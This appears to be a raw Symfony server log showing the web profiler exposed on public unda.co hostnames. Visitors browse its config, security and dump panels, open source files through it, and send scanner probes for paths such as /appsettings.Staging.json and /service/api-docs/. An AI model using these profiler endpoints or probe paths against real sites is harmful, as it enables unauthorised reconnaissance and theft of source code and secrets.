[2025-12-17 19:46:09] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 19:46:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 19:46:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 19:46:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 19:46:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 19:46:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 19:46:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 19:46:09] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 19:46:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 19:46:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 19:46:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 19:46:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 19:46:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 19:46:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 19:46:09] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 19:49:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96","method":"GET"} []
[2025-12-17 19:49:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 19:49:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=form","method":"GET"} []
[2025-12-17 19:49:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-17 19:55:13] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"39fd77","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/39fd77/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 19:55:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 19:59:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"545a62","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/545a62?panel=request","method":"GET"} []
[2025-12-17 19:59:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 19:59:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/latest?panel=router","method":"GET"} []
[2025-12-17 19:59:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-17 19:59:15] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"0bd500","_route":"_profiler_router"},"request_uri":"https://auth.unda.co/_profiler/0bd500/router","method":"GET"} []
[2025-12-17 20:01:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=request","method":"GET"} []
[2025-12-17 20:01:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 20:04:52] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 20:06:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c59856","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c59856","method":"GET"} []
[2025-12-17 20:06:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 20:06:57] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"99d60d","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/99d60d","method":"GET"} []
[2025-12-17 20:08:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Faws%2Faws-sdk-php-symfony%2Fsrc&line=0","method":"GET"} []
[2025-12-17 20:08:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-17 20:08:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-17 20:11:12] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 20:11:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:11:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:11:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:11:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:11:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-17 20:14:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=twig","method":"GET"} []
[2025-12-17 20:14:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 20:21:22] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 20:21:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:21:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:21:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:21:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:21:24] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-17 20:26:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=exception","method":"GET"} []
[2025-12-17 20:26:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-17 20:26:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=time","method":"GET"} []
[2025-12-17 20:26:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 20:27:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=request","method":"GET"} []
[2025-12-17 20:27:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 20:30:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:33:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=src%2FHona%2FAuthBundle%2FController%2FHomeController.php&line=17","method":"GET"} []
[2025-12-17 20:36:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemaps.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemaps.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 20:38:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=security","method":"GET"} []
[2025-12-17 20:38:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 20:42:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=exception","method":"GET"} []
[2025-12-17 20:42:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-17 20:48:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=time","method":"GET"} []
[2025-12-17 20:48:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 20:49:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=request","method":"GET"} []
[2025-12-17 20:49:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 20:50:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=security","method":"GET"} []
[2025-12-17 20:50:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 20:58:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebServerBundle&line=0","method":"GET"} []
[2025-12-17 20:58:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f1e7f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f1e7f8?panel=dump","method":"GET"} []
[2025-12-17 20:58:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-17 21:00:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=config","method":"GET"} []
[2025-12-17 21:00:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 21:02:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=dump","method":"GET"} []
[2025-12-17 21:02:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-17 21:04:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:04:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:04:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:04:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"711f96","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/711f96?panel=config","method":"GET"} []
[2025-12-17 21:04:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 21:04:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:04:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:05:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:12:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=cache","method":"GET"} []
[2025-12-17 21:12:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 21:22:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Staging.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Staging.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:23:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-17 21:23:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-17 21:26:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555","method":"GET"} []
[2025-12-17 21:26:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 21:30:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e80d5b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e80d5b?panel=form","method":"GET"} []
